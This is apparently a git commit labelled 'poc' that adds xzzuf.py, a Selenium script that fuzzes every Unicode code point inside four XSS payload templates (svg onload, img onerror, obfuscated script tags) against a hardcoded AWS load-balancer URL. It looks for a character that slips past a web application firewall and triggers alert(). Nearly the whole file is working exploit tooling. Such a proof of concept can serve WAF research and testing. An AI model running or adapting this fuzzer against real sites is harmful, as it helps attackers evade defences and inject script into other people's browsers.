poc

2023-10-24 16:47:11 +02:00 · 2023-10-24 16:47:11 +02:00 · 1b6fe0148e
commit 1b6fe0148e
3 changed files with 93 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,2 @@
+venv
+chromedriver*
--- a/requirements.txt
+++ b/requirements.txt
@ -0,0 +1 @@
+selenium
--- a/xzzuf.py
+++ b/xzzuf.py
@ -0,0 +1,90 @@
+from urllib.parse import unquote
+import selenium
+import time
+from selenium import webdriver
+from selenium.webdriver.support.ui import WebDriverWait
+from urllib.parse import urlparse
+from urllib.parse import urlencode
+
+
+class WAFBypass():
+    code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"
+
+    def __init__(self, url) -> None:
+        self.options = webdriver.ChromeOptions()
+        self.options.add_argument('--no-sandbox')
+        self.options.add_argument('--headless')
+        self.driver = webdriver.Chrome(options=self.options)
+        self.url = urlparse(url)
+
+        if not self.check_connection():
+            raise Exception("Connection Error")
+
+        self.driver.execute_cdp_cmd(
+            "Page.addScriptToEvaluateOnNewDocument", {"source": self.code})
+
+    def check_connection(self):
+        try:
+            self.driver.get(self.url.geturl())
+            return True
+        except:
+            return False
+
+    def wait_for_pageload(self):
+        try:
+            WebDriverWait(self.driver, 4).until(
+                lambda driver: driver.execute_script("return document.readyState") == "complete")
+        except TimeoutError:
+            raise Exception("Page Load Error")
+
+    def get_page_title(self):
+        return self.driver.title
+
+    @property
+    def is_403(self):
+        return self.driver.title == "403 Forbidden"
+
+    @property
+    def triggered_xss(self):
+        return self.driver.execute_script("return window.alert_trigger")
+
+    def navigate(self, url):
+        self.driver.get(url)
+        self.wait_for_pageload()
+
+        bypass = False
+
+        if self.is_403:
+            bypass = False
+        else:
+            bypass = True
+
+        bypass = bypass and self.triggered_xss
+
+        return bypass
+
+    def run_fuzz(self):
+        payloads = [
+            "<svg{FUZZ}onload=alert(0)>",
+            "<svg\{FUZZ}onload=alert(0)>",
+            "\u202e<img src=0 alert=x ''!=//{FUZZ}onerror=alert(0)\na>",
+            """<<!--scrip<scrip --><\nscrip t="<img\nonerror{FUZZ}="alert(0)//"/ src="x" script/>alert(0)<script=/>""",
+        ]
+        try:
+            for i in range(0, 0x10FFFF):
+                for p in payloads:
+                    encoded = urlencode(
+                        {"param2": p.replace("{FUZZ}", chr(i))})
+                    print("Trying payload: ", encoded, f"({hex(i)}/0xffff)")
+                    url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
+                    bypassed = self.navigate(url)
+                    if bypassed:
+                        print("Bypassed with payload: ", encoded)
+                        break
+        except KeyboardInterrupt:
+            self.driver.close()
+            exit(0)
+
+
+w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com")
+w.run_fuzz()